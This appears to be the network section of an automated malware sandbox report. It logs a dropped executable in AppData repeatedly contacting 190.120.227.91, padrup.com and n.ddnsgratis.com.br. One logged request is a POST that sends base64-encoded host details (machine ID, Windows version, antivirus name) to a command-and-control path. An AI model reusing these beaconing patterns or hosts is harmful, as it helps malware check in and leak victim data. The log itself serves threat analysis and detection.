                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:51.117522955 CEST224INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODIzMC43NzU0OjAwOGExMDFkODQxMDZhOWI3NGExODQwNmE4YWY2MGIzMjgzNDQwY2QxNWNhMDQzOThkZDc4N2YxNzY4OTZhODQ6Njc
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:51.117535114 CEST1236INData Raw: 78 4d 6a 4e 69 5a 54 5a 69 5a 44 52 6d 4e 41 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61 72 20 78 6b 77 20 3d 20 27 27 3b 0a 76
                                                                                                                                                                                                                                                                                          Data Ascii: xMjNiZTZiZDRmNA==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';</script>
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:51.117548943 CEST540INData Raw: 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31 32 33 62 65 36 26 74 6f 6b 65 6e 3d 27
                                                                                                                                                                                                                                                                                          Data Ascii: } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67123be6&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, 'f3f8ee064d94256efbe2f292968333eba146ba50dd1');</script><script type='


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          46192.168.2.950028190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:51.487418890 CEST169OUTGET /sobakavolos.gif?19856214=856343592 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          47192.168.2.950029185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:56.065637112 CEST158OUTGET /sobaka1.gif?1a078ca7=-1238050671 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:57.132951975 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:43:57 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_CA+jlT3JA93wYYmgWWw+oPOp5RD/H7ePVuBUV/cCq2FtMyGAwnXqRMclBGf2ZAoYJgftIUVxXJ2KR5lwkys5dA==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:57.132997990 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODIzNi43NzkxOjEyN2ZjZDE0N2Y0MzViZjgwMmQ5NmE0ZmNlY2Y5MWUyYWExMGNhMDg3MTZmY2JhMjM3YjE0ODQxODczNmZkYTA6NjcxMjNiZWNiZTM3MA==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:57.133016109 CEST764INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          48192.168.2.950030190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:57.386337996 CEST170OUTGET /sobakavolos.gif?253429ca=1872526686 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          49192.168.2.950031194.5.152.215807352C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:58.979418993 CEST453OUTPOST /n/tasks.php HTTP/1.0
                                                                                                                                                                                                                                                                                          Host: n.ddnsgratis.com.br
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0
                                                                                                                                                                                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                          Cookie: auth=bc00595440e801f8a5d2a2ad13b9791b
                                                                                                                                                                                                                                                                                          Content-length: 192
                                                                                                                                                                                                                                                                                          Data Raw: 5f 77 76 3d 59 32 31 6b 4a 6a 6c 6c 4d 54 51 32 59 6d 55 35 4c 57 4d 33 4e 6d 45 74 4e 44 63 79 4d 43 31 69 59 32 52 69 4c 54 55 7a 4d 44 45 78 59 6a 67 33 59 6d 51 77 4e 69 5a 6b 52 32 78 31 57 56 4e 42 4e 6b 6c 47 55 6b 70 55 61 30 56 30 56 55 56 4e 5a 30 39 70 51 54 52 4f 65 6d 63 77 54 56 52 46 4a 54 4e 45 4a 6c 64 70 62 6d 52 76 64 33 4d 6c 4d 6a 41 78 4d 43 55 79 4d 43 67 32 4e 43 31 69 61 58 51 70 4a 6a 45 6d 56 32 6c 75 5a 47 39 33 63 79 55 79 4d 45 52 6c 5a 6d 56 75 5a 47 56 79 4a 6a 55 75 4d 53 59 78 4f 43 34 78 4d 43 34 79 4d 44 49 30 4a 6b 35 50 54 6b 55 3d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: _wv=Y21kJjllMTQ2YmU5LWM3NmEtNDcyMC1iY2RiLTUzMDExYjg3YmQwNiZkR2x1WVNBNklGUkpUa0V0VUVNZ09pQTROemcwTVRFJTNEJldpbmRvd3MlMjAxMCUyMCg2NC1iaXQpJjEmV2luZG93cyUyMERlZmVuZGVyJjUuMSYxOC4xMC4yMDI0Jk5PTkU=
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:04.999181986 CEST606INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:43:59 GMT
                                                                                                                                                                                                                                                                                          Server: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.14
                                                                                                                                                                                                                                                                                          X-Powered-By: PHP/5.6.14
                                                                                                                                                                                                                                                                                          Status: 404 Not Found
                                                                                                                                                                                                                                                                                          Content-Length: 377
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf8
                                                                                                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 2f 74 61 73 6b 73 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 0d 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 3c 21 [TRUNCATED]
                                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /n/tasks.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>...-MTQwMTA3NjM4NjcxNTc2NiNyYXRlIDUj--->


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          50192.168.2.950032185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:01.925610065 CEST156OUTGET /sobaka1.gif?25bc9cf1=633117937 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:03.034373999 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:44:02 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_MIMBmFRdG8aP4CneOFXARCUHYEtEAleqiZGS5SHLOObvvrUPDTe3WRToCRl6ZwHnfHQvVjHV7UouIKNheqRikQ==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:03.034399033 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODI0Mi42ODg3OjI0MzYwNjZhZGYyY2ZkNTFjMTcxODU2MWJhMjY2YmNkMDcyNzlkNjdlZmMxNTczZTUwN2ZlOTY0N2Y3NmMyMjg6NjcxMjNiZjJhODIyYg==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:03.034415960 CEST424INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:03.034557104 CEST340INData Raw: 0d 0a 31 34 36 0d 0a 36 37 33 62 62 32 31 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
                                                                                                                                                                                                                                                                                          Data Ascii: 146673bb21');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          51192.168.2.950033190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:03.473856926 CEST170OUTGET /sobakavolos.gif?25d5c2b0=-486371296 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          52192.168.2.950034185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.931842089 CEST156OUTGET /sobaka1.gif?269bb762=239207342 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:09.073398113 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:44:08 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_WF+2luepB9K37YzWFjGbYBctJMCgtXTdTtaQSiG8dSIh4y4xGHm4pfYEl+R9zBWGlZZJMqGRFVDL8k8dbkj7AA==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:09.073458910 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODI0OC43MTAxOjNiY2RlMDJjNzM0ZGFhODEwNGJjMGEwNWY1NzlkOGFhM2QzYzExMzNjNjc1YWJjNzdlMWQwNDBjZWM4MzNhNDA6NjcxMjNiZjhhZDVhNA==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:09.073498964 CEST764INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          53192.168.2.950035190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:09.345932007 CEST171OUTGET /sobakavolos.gif?270a0145=-2040263502 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
